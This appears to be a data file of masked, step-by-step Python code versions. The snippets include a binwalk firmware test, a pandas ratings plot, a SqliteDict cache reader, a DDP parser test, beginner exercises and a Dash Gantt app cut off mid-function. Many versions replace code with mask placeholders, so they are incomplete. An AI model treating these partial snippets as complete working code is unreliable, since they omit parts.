"step-3": "from os.path import dirname\nimport binwalk\nfrom nose.tools import eq_, ok_\n\n\ndef test_firmware_squashfs():\n \"\"\"\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n \"\"\"\n expected_results = [[0,\n 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'], [\n 112,\n 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'\n ], [1179760,\n 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'\n ], [1179792,\n 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'\n ]]\n scan_result = binwalk.scan(dirname(__file__) +\n '/input-vectors/firmware.squashfs', signature=True, quiet=True,\n extract=True)\n eq_(len(scan_result), 1)\n eq_(len(scan_result[0].results), len(expected_results))\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n",
"step-4": "from os.path import dirname\n\nimport binwalk\nfrom nose.tools import eq_, ok_\n\n\ndef test_firmware_squashfs():\n '''\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n '''\n expected_results = [\n [0, 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'],\n [112, 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'],\n [1179760, 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'],\n [1179792, 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'],\n ]\n\n scan_result = binwalk.scan(\n dirname(__file__) + '/input-vectors/firmware.squashfs',\n signature=True,\n quiet=True,\n extract=True) # Throws a warning for missing external extractor\n # Test number of modules used\n eq_(len(scan_result), 1)\n # Test number of results for that module\n eq_(len(scan_result[0].results), len(expected_results))\n # Test result-description\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Created by Yuexiong Ding
# Date: 2018/9/4
# Description:
|
normal
|
{
"blob_id": "ddb139fa3fbfa1218459e3865150465a44a03bea",
"index": 6306,
"step-1": "# Created by Yuexiong Ding\n# Date: 2018/9/4\n# Description: \n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
1
]
}
|
[
1
] |
<|reserved_special_token_0|>
def get_ratings(file_path):
ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'
)
print('前5条数据:\n{}\n'.format(ratings.head(5)))
print('总的数据条数:\n{}\n'.format(ratings.count()))
print('用户对图书的评分范围:<{},{}>\n'.format(min(ratings['Book-Rating']),
ratings['Book-Rating'].max()))
rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()
plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())
for x, y in zip(rateSer.keys(), rateSer.values):
plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)
plt.xlabel('用户评分')
plt.ylabel('评分对应的人数')
plt.title('每种评分下对应的人数统计图')
plt.show()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_ratings(file_path):
ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'
)
print('前5条数据:\n{}\n'.format(ratings.head(5)))
print('总的数据条数:\n{}\n'.format(ratings.count()))
print('用户对图书的评分范围:<{},{}>\n'.format(min(ratings['Book-Rating']),
ratings['Book-Rating'].max()))
rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()
plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())
for x, y in zip(rateSer.keys(), rateSer.values):
plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)
plt.xlabel('用户评分')
plt.ylabel('评分对应的人数')
plt.title('每种评分下对应的人数统计图')
plt.show()
if __name__ == '__main__':
get_ratings(file_path='BX-Book-Ratings.csv')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
plt.rcParams['font.sans-serif'] = ['SimHei']
def get_ratings(file_path):
ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'
)
print('前5条数据:\n{}\n'.format(ratings.head(5)))
print('总的数据条数:\n{}\n'.format(ratings.count()))
print('用户对图书的评分范围:<{},{}>\n'.format(min(ratings['Book-Rating']),
ratings['Book-Rating'].max()))
rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()
plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())
for x, y in zip(rateSer.keys(), rateSer.values):
plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)
plt.xlabel('用户评分')
plt.ylabel('评分对应的人数')
plt.title('每种评分下对应的人数统计图')
plt.show()
if __name__ == '__main__':
get_ratings(file_path='BX-Book-Ratings.csv')
<|reserved_special_token_1|>
import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams['font.sans-serif'] = ['SimHei']
def get_ratings(file_path):
ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'
)
print('前5条数据:\n{}\n'.format(ratings.head(5)))
print('总的数据条数:\n{}\n'.format(ratings.count()))
print('用户对图书的评分范围:<{},{}>\n'.format(min(ratings['Book-Rating']),
ratings['Book-Rating'].max()))
rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()
plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())
for x, y in zip(rateSer.keys(), rateSer.values):
plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)
plt.xlabel('用户评分')
plt.ylabel('评分对应的人数')
plt.title('每种评分下对应的人数统计图')
plt.show()
if __name__ == '__main__':
get_ratings(file_path='BX-Book-Ratings.csv')
<|reserved_special_token_1|>
import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams['font.sans-serif'] = ['SimHei']
def get_ratings(file_path):
# 图书的ISBN中可能包含字符,所以在使用pandas读取文件时,需要指定编码
ratings = pd.read_table(file_path, header=0,
sep=';', encoding='ISO-8859-1')
print('前5条数据:\n{}\n'.format(ratings.head(5)))
print('总的数据条数:\n{}\n'.format(ratings.count()))
print('用户对图书的评分范围:<{},{}>\n'.format(
min(ratings['Book-Rating']), ratings['Book-Rating'].max()))
rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()
plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())
for x, y in zip(rateSer.keys(), rateSer.values):
plt.text(x, y+1, '%.0f' % y, ha='center', va='bottom', fontsize=9)
plt.xlabel('用户评分')
plt.ylabel('评分对应的人数')
plt.title('每种评分下对应的人数统计图')
plt.show()
if __name__ == "__main__":
get_ratings(file_path='BX-Book-Ratings.csv')
|
flexible
|
{
"blob_id": "be5178f013e639d5179ed1af380dd7a63044bff2",
"index": 5636,
"step-1": "<mask token>\n\n\ndef get_ratings(file_path):\n ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'\n )\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(min(ratings['Book-Rating']),\n ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_ratings(file_path):\n ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'\n )\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(min(ratings['Book-Rating']),\n ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\nif __name__ == '__main__':\n get_ratings(file_path='BX-Book-Ratings.csv')\n",
"step-3": "<mask token>\nplt.rcParams['font.sans-serif'] = ['SimHei']\n\n\ndef get_ratings(file_path):\n ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'\n )\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(min(ratings['Book-Rating']),\n ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\nif __name__ == '__main__':\n get_ratings(file_path='BX-Book-Ratings.csv')\n",
"step-4": "import pandas as pd\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif'] = ['SimHei']\n\n\ndef get_ratings(file_path):\n ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'\n )\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(min(ratings['Book-Rating']),\n ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\nif __name__ == '__main__':\n get_ratings(file_path='BX-Book-Ratings.csv')\n",
"step-5": "import pandas as pd\nimport matplotlib.pyplot as plt\n\nplt.rcParams['font.sans-serif'] = ['SimHei']\n\n\ndef get_ratings(file_path):\n # 图书的ISBN中可能包含字符,所以在使用pandas读取文件时,需要指定编码\n ratings = pd.read_table(file_path, header=0,\n sep=';', encoding='ISO-8859-1')\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(\n min(ratings['Book-Rating']), ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y+1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\nif __name__ == \"__main__\":\n get_ratings(file_path='BX-Book-Ratings.csv')\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main() ->None:
try:
command = sys.argv[0]
args = sys.argv[1:]
cli.main(command, args)
except KeyboardInterrupt:
pass
<|reserved_special_token_1|>
import sys
from . import cli
def main() ->None:
try:
command = sys.argv[0]
args = sys.argv[1:]
cli.main(command, args)
except KeyboardInterrupt:
pass
|
flexible
|
{
"blob_id": "9969dcf820a5ff34b483593cd43e4dfba9588ed2",
"index": 4348,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main() ->None:\n try:\n command = sys.argv[0]\n args = sys.argv[1:]\n cli.main(command, args)\n except KeyboardInterrupt:\n pass\n",
"step-3": "import sys\nfrom . import cli\n\n\ndef main() ->None:\n try:\n command = sys.argv[0]\n args = sys.argv[1:]\n cli.main(command, args)\n except KeyboardInterrupt:\n pass\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def gz_decode(obj):
return pickle.loads(zlib.decompress(bytes(obj)))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gz_encode(obj):
return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.
HIGHEST_PROTOCOL)))
def gz_decode(obj):
return pickle.loads(zlib.decompress(bytes(obj)))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gz_encode(obj):
return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.
HIGHEST_PROTOCOL)))
def gz_decode(obj):
return pickle.loads(zlib.decompress(bytes(obj)))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--dnscache', default='dnscache.sqld', help=
'IP address cache default: %(default)s')
parser.add_argument('--download', default='pages.sqld', help=
'Here is where the downloaded pages go: %(default)s')
parser.add_argument('--r404', default='404.sqld', help=
'Here is where we remember pages that gave 404 etc: %(default)s')
args = parser.parse_args()
result_store = SqliteDict(args.download, encode=gz_encode, decode=
gz_decode, autocommit=True)
for url, cont in result_store.items():
print(url, cont[:30])
r404 = SqliteDict(args.r404, autocommit=True)
for url, status in r404.items():
print(url, status)
<|reserved_special_token_1|>
from sqlitedict import SqliteDict
import sys
import socket
import urllib
import argparse
import zlib, pickle, sqlite3
import random
from datetime import datetime
import time
from urllib.parse import urlparse
import hashlib
import subprocess
import requests
from multiprocessing import Pool
def gz_encode(obj):
return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.
HIGHEST_PROTOCOL)))
def gz_decode(obj):
return pickle.loads(zlib.decompress(bytes(obj)))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--dnscache', default='dnscache.sqld', help=
'IP address cache default: %(default)s')
parser.add_argument('--download', default='pages.sqld', help=
'Here is where the downloaded pages go: %(default)s')
parser.add_argument('--r404', default='404.sqld', help=
'Here is where we remember pages that gave 404 etc: %(default)s')
args = parser.parse_args()
result_store = SqliteDict(args.download, encode=gz_encode, decode=
gz_decode, autocommit=True)
for url, cont in result_store.items():
print(url, cont[:30])
r404 = SqliteDict(args.r404, autocommit=True)
for url, status in r404.items():
print(url, status)
<|reserved_special_token_1|>
from sqlitedict import SqliteDict
import sys
import socket
import urllib
import argparse
import zlib, pickle, sqlite3
import random
from datetime import datetime
import time
from urllib.parse import urlparse
import hashlib
import subprocess
import requests
from multiprocessing import Pool
def gz_encode(obj):
return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)))
def gz_decode(obj):
return pickle.loads(zlib.decompress(bytes(obj)))
if __name__=="__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--dnscache', default="dnscache.sqld", help='IP address cache default: %(default)s')
parser.add_argument('--download', default="pages.sqld", help='Here is where the downloaded pages go: %(default)s')
parser.add_argument('--r404', default="404.sqld", help='Here is where we remember pages that gave 404 etc: %(default)s')
args = parser.parse_args()
#2) Results setup
result_store = SqliteDict(args.download, encode=gz_encode, decode=gz_decode, autocommit=True)
for url,cont in result_store.items():
print(url,cont[:30])
#3) 404 setup
r404 = SqliteDict(args.r404, autocommit=True)
for url,status in r404.items():
print(url,status)
|
flexible
|
{
"blob_id": "295d6a66335491b406f47212064da9fd5fca6eb6",
"index": 6812,
"step-1": "<mask token>\n\n\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef gz_encode(obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.\n HIGHEST_PROTOCOL)))\n\n\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef gz_encode(obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.\n HIGHEST_PROTOCOL)))\n\n\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dnscache', default='dnscache.sqld', help=\n 'IP address cache default: %(default)s')\n parser.add_argument('--download', default='pages.sqld', help=\n 'Here is where the downloaded pages go: %(default)s')\n parser.add_argument('--r404', default='404.sqld', help=\n 'Here is where we remember pages that gave 404 etc: %(default)s')\n args = parser.parse_args()\n result_store = SqliteDict(args.download, encode=gz_encode, decode=\n gz_decode, autocommit=True)\n for url, cont in result_store.items():\n print(url, cont[:30])\n r404 = SqliteDict(args.r404, autocommit=True)\n for url, status in r404.items():\n print(url, status)\n",
"step-4": "from sqlitedict import SqliteDict\nimport sys\nimport socket\nimport urllib\nimport argparse\nimport zlib, pickle, sqlite3\nimport random\nfrom datetime import datetime\nimport time\nfrom urllib.parse import urlparse\nimport hashlib\nimport subprocess\nimport requests\nfrom multiprocessing import Pool\n\n\ndef gz_encode(obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.\n HIGHEST_PROTOCOL)))\n\n\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dnscache', default='dnscache.sqld', help=\n 'IP address cache default: %(default)s')\n parser.add_argument('--download', default='pages.sqld', help=\n 'Here is where the downloaded pages go: %(default)s')\n parser.add_argument('--r404', default='404.sqld', help=\n 'Here is where we remember pages that gave 404 etc: %(default)s')\n args = parser.parse_args()\n result_store = SqliteDict(args.download, encode=gz_encode, decode=\n gz_decode, autocommit=True)\n for url, cont in result_store.items():\n print(url, cont[:30])\n r404 = SqliteDict(args.r404, autocommit=True)\n for url, status in r404.items():\n print(url, status)\n",
"step-5": "from sqlitedict import SqliteDict\nimport sys\nimport socket\nimport urllib\nimport argparse\nimport zlib, pickle, sqlite3\nimport random\nfrom datetime import datetime\nimport time\nfrom urllib.parse import urlparse\nimport hashlib\nimport subprocess\nimport requests\nfrom multiprocessing import Pool\n\ndef gz_encode(obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)))\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--dnscache', default=\"dnscache.sqld\", help='IP address cache default: %(default)s')\n parser.add_argument('--download', default=\"pages.sqld\", help='Here is where the downloaded pages go: %(default)s')\n parser.add_argument('--r404', default=\"404.sqld\", help='Here is where we remember pages that gave 404 etc: %(default)s')\n args = parser.parse_args()\n\n #2) Results setup\n result_store = SqliteDict(args.download, encode=gz_encode, decode=gz_decode, autocommit=True)\n\n for url,cont in result_store.items():\n print(url,cont[:30])\n \n #3) 404 setup\n r404 = SqliteDict(args.r404, autocommit=True)\n for url,status in r404.items():\n print(url,status)\n \n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
alien_0 = {} # 声明一个空字典
alien_0['color'] = 'green' # 向空字典中添加值
alien_0['points'] = 5
print(alien_0)
x = alien_0['color']
print(f"\nThe alien is {alien_0['color']}") # 引号的用法
alien_0['color'] = 'yellow' # 对字典中的元素重新赋值
print(f"The alien is now {alien_0['color']}")
|
normal
|
{
"blob_id": "f4dd9500835cb22a859da8bd57487052522bb593",
"index": 7697,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(alien_0)\n<mask token>\nprint(f\"\"\"\nThe alien is {alien_0['color']}\"\"\")\n<mask token>\nprint(f\"The alien is now {alien_0['color']}\")\n",
"step-3": "alien_0 = {}\nalien_0['color'] = 'green'\nalien_0['points'] = 5\nprint(alien_0)\nx = alien_0['color']\nprint(f\"\"\"\nThe alien is {alien_0['color']}\"\"\")\nalien_0['color'] = 'yellow'\nprint(f\"The alien is now {alien_0['color']}\")\n",
"step-4": "\nalien_0 = {} # 声明一个空字典\n\nalien_0['color'] = 'green' # 向空字典中添加值\nalien_0['points'] = 5\n\nprint(alien_0)\n\nx = alien_0['color']\n\nprint(f\"\\nThe alien is {alien_0['color']}\") # 引号的用法\n\nalien_0['color'] = 'yellow' # 对字典中的元素重新赋值\n\nprint(f\"The alien is now {alien_0['color']}\")\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class MethodMessageParserTestCase(unittest.TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MethodMessageParserTestCase(unittest.TestCase):
<|reserved_special_token_0|>
def test_parse(self):
id = 'id'
method = 'method'
params = [True, 1.0]
message = self.parser.parse({'msg': 'method', 'id': id, 'method':
method, 'params': params})
self.assertEqual(message, MethodMessage(id, method, params))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MethodMessageParserTestCase(unittest.TestCase):
def setUp(self):
self.parser = MethodMessageParser()
def test_parse(self):
id = 'id'
method = 'method'
params = [True, 1.0]
message = self.parser.parse({'msg': 'method', 'id': id, 'method':
method, 'params': params})
self.assertEqual(message, MethodMessage(id, method, params))
<|reserved_special_token_1|>
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
from ddp.messages.client import MethodMessage
from ddp.messages.client import MethodMessageParser
class MethodMessageParserTestCase(unittest.TestCase):
def setUp(self):
self.parser = MethodMessageParser()
def test_parse(self):
id = 'id'
method = 'method'
params = [True, 1.0]
message = self.parser.parse({'msg': 'method', 'id': id, 'method':
method, 'params': params})
self.assertEqual(message, MethodMessage(id, method, params))
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Copyright 2014 Foxdog Studios
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
from ddp.messages.client import MethodMessage
from ddp.messages.client import MethodMessageParser
class MethodMessageParserTestCase(unittest.TestCase):
def setUp(self):
self.parser = MethodMessageParser()
def test_parse(self):
id = 'id'
method = 'method'
params = [True, 1.0]
message = self.parser.parse({'msg': 'method', 'id': id,
'method': method, 'params': params})
self.assertEqual(message, MethodMessage(id, method, params))
|
flexible
|
{
"blob_id": "e103e7a215614e1a7923838b775f49bba2792036",
"index": 8508,
"step-1": "<mask token>\n\n\nclass MethodMessageParserTestCase(unittest.TestCase):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass MethodMessageParserTestCase(unittest.TestCase):\n <mask token>\n\n def test_parse(self):\n id = 'id'\n method = 'method'\n params = [True, 1.0]\n message = self.parser.parse({'msg': 'method', 'id': id, 'method':\n method, 'params': params})\n self.assertEqual(message, MethodMessage(id, method, params))\n",
"step-3": "<mask token>\n\n\nclass MethodMessageParserTestCase(unittest.TestCase):\n\n def setUp(self):\n self.parser = MethodMessageParser()\n\n def test_parse(self):\n id = 'id'\n method = 'method'\n params = [True, 1.0]\n message = self.parser.parse({'msg': 'method', 'id': id, 'method':\n method, 'params': params})\n self.assertEqual(message, MethodMessage(id, method, params))\n",
"step-4": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport unittest\nfrom ddp.messages.client import MethodMessage\nfrom ddp.messages.client import MethodMessageParser\n\n\nclass MethodMessageParserTestCase(unittest.TestCase):\n\n def setUp(self):\n self.parser = MethodMessageParser()\n\n def test_parse(self):\n id = 'id'\n method = 'method'\n params = [True, 1.0]\n message = self.parser.parse({'msg': 'method', 'id': id, 'method':\n method, 'params': params})\n self.assertEqual(message, MethodMessage(id, method, params))\n",
"step-5": "# -*- coding: utf-8 -*-\n\n# Copyright 2014 Foxdog Studios\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport unittest\n\nfrom ddp.messages.client import MethodMessage\nfrom ddp.messages.client import MethodMessageParser\n\n\nclass MethodMessageParserTestCase(unittest.TestCase):\n def setUp(self):\n self.parser = MethodMessageParser()\n\n def test_parse(self):\n id = 'id'\n method = 'method'\n params = [True, 1.0]\n message = self.parser.parse({'msg': 'method', 'id': id,\n 'method': method, 'params': params})\n self.assertEqual(message, MethodMessage(id, method, params))\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(float(my_int))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
greeting = 'My name is '
your_name = ''
best_string = 'I am '
your_age = 6
my_int = 5
print(float(my_int))
pi = 3.1415
<|reserved_special_token_1|>
# Create two integer variables and print their sum. What is the type of the
# result?
# Now, create a float variable and print its sum with an integer variable. What
# is the type of the result.
# Divide your smallest integer value by your largest integer value. Is the
# result what you expected? Now, do the same with your float variable and an
# integer variable. What to you get?
# Fill in the blanks, try adding the following two string variables and print
# the result. What do you get?
greeting = "My name is "
your_name = ""
# Try adding the following variables.
best_string = "I am "
your_age = 6
# Although Python can add integers and floats, it can't add strings and integers.
# In order to do this, we need to convert the integer variable to a string using
# the str keyword
# Uncomment the line below and check that it works.
# print(best_string + str(your_age))
# You can create complex string by using multiple string additions.
# Uncomment the line below and see the result.
# print(best_string + str(your_age) + " years old")
# We can also use the float keyword and the int keyword to convert variables to
# floats and ints respectively.
my_int = 5
print(float(my_int))
# Now, convert pi to an int.
pi = 3.1415
|
flexible
|
{
"blob_id": "fcbbffe0682da9f2131fdddbef606dcae3303ce9",
"index": 1979,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(float(my_int))\n<mask token>\n",
"step-3": "greeting = 'My name is '\nyour_name = ''\nbest_string = 'I am '\nyour_age = 6\nmy_int = 5\nprint(float(my_int))\npi = 3.1415\n",
"step-4": "# Create two integer variables and print their sum. What is the type of the\n# result?\n\n# Now, create a float variable and print its sum with an integer variable. What\n# is the type of the result.\n\n# Divide your smallest integer value by your largest integer value. Is the\n# result what you expected? Now, do the same with your float variable and an\n# integer variable. What to you get?\n\n# Fill in the blanks, try adding the following two string variables and print\n# the result. What do you get?\ngreeting = \"My name is \"\nyour_name = \"\"\n\n# Try adding the following variables.\nbest_string = \"I am \"\nyour_age = 6\n\n\n# Although Python can add integers and floats, it can't add strings and integers.\n# In order to do this, we need to convert the integer variable to a string using\n# the str keyword\n\n# Uncomment the line below and check that it works.\n# print(best_string + str(your_age))\n\n# You can create complex string by using multiple string additions.\n# Uncomment the line below and see the result.\n# print(best_string + str(your_age) + \" years old\")\n\n# We can also use the float keyword and the int keyword to convert variables to\n# floats and ints respectively.\n\nmy_int = 5\nprint(float(my_int))\n\n# Now, convert pi to an int.\n\npi = 3.1415\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
@app.callback(Output('ganttpersoon', 'figure'), [Input(
'dropdownganttpersoon', 'value'), Input('dropdownganttpersoonstatus',
'value')])
def update_ganttpersoon(v1, v2):
ganttdata = []
for i, j in data['kaarten'].items():
if j[config.get('Custom Field for Person')] == v1 and j['Status'
] != 'Archived' and j['Status'] in v2:
try:
ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(
'Custom Field for Starting date')].date(), Finish=j[
config.get('Custom Field for Ending date')].date(),
Resource=j['Epic']))
except:
pass
if ganttdata != []:
fig = ff.create_gantt(ganttdata, index_col='Resource',
show_colorbar=True, showgrid_x=True, showgrid_y=True)
fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)')
return fig
else:
return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
<|reserved_special_token_0|>
@app.server.route('/dash/configuration/')
def download_file():
return flask.send_file('./configuration/configuration.txt',
attachment_filename='configuration.txt', as_attachment=True,
cache_timeout=0)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_data(value):
global data
global config
with open('./configuration/configuration.txt') as json_file:
configfile = json.load(json_file)
config = configfile.get(value)
keys = 'key=' + credentials.get('API key') + '&token=' + credentials.get(
'API token')
